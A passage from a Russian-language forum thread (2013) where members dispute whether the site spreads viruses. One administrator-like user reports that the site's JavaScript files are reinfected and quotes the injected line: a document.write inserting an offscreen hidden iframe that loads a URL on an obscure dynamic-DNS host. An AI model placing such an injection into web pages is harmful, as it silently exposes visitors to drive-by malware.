Общий раздел > Конференц-зал

ФОРУМ и САЙТ: новости обновлений, проблемы, жалобы...

<< < (20/300) > >>

snap:
Обещали что можно будет выбрать.

Alex_Wolf:
Вот читаю я ваши сообщения про вирусы с форума и удивляюсь -ГДЕЕЕЕЕ ?????!!!!  Я собственно кроме этого форума ни куда не лазию по и-нету и аваст у меня стоит уже не первый год и.... тишина !!!!! У меня аваст на форум не ругается. Вывод - подцепили вы вируса явно где-то еще, а не на форуме. Так, что лечите СВОИ компы и не суйте что ни попадя куда ни попадя  ;D
Поверьте, я сам занимался инф. сетями и сделал для себя вывод - если сам не запустишь на свой комп вирус, то хрен он залезет через антивирус. А лезут вирусы обычно когда пытаешься крякнуть какую-нить прогу. И вот эти крякалки (генераторы ключей) обычно нашпиговывают вирусами. Еще бывает вирусы подвешивают на какие-нить картинки - жмешь на открытие картинки, а вместе с ней подсаживается вирус в комп. Ну и все в таком духе. В общем пока сам не запустишь вирусягу - хрен он прорвется через защиту.

Vlad9869:
У меня нод молчит.

Nightcat:

--- Цитата: Vlad9869 от 08 Января, 2013, 16:10 ---У меня нод молчит.

--- Конец цитаты ---

--- Цитата: Alex_Wolf от 08 Января, 2013, 16:04 ---Вот читаю я ваши сообщения про вирусы с форума и удивляюсь -ГДЕЕЕЕЕ ?????!!!!  Я собственно кроме этого форума ни куда не лазию по и-нету и аваст у меня стоит уже не первый год и.... тишина !!!!! У меня аваст на форум не ругается. Вывод - подцепили вы вируса явно где-то еще, а не на форуме. Так, что лечите СВОИ компы и не суйте что ни попадя куда ни попадя  ;D
Поверьте, я сам занимался инф. сетями и сделал для себя вывод - если сам не запустишь на свой комп вирус, то хрен он залезет через антивирус. А лезут вирусы обычно когда пытаешься крякнуть какую-нить прогу. И вот эти крякалки (генераторы ключей) обычно нашпиговывают вирусами. Еще бывает вирусы подвешивают на какие-нить картинки - жмешь на открытие картинки, а вместе с ней подсаживается вирус в комп. Ну и все в таком духе. В общем пока сам не запустишь вирусягу - хрен он прорвется через защиту.

--- Конец цитаты ---

Вирус на форуме есть... заражены все джава-скрипты сайта(не только форума) причем во все добавляется одна строчка "docment.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://cwdgxf.ddn_s.name/67b6be430c7c.V0yi5?13" height="500" width="500"></iframe>')" (адреса каждый раз разные)
Однако что сцуко характерно... пять файлов поправишь, пока правишь шестой - первые пять опять заражены...
пока чешу репу...
Кстати нод и симантек действительно молчат - словил блокировку винды и домашним и рабочим компом... не понятное дело что это блокировка мне что чих... но вот как форум вычистить пока не знаю... и заражен он(сайт) походу с начала декабря а то и ноября судя по логам...

denisimoos:
это происки эдганаводов :D

Навигация

[0] Главная страница сообщений

[#] Следующая страница

[*] Предыдущая страница

Перейти к полной версии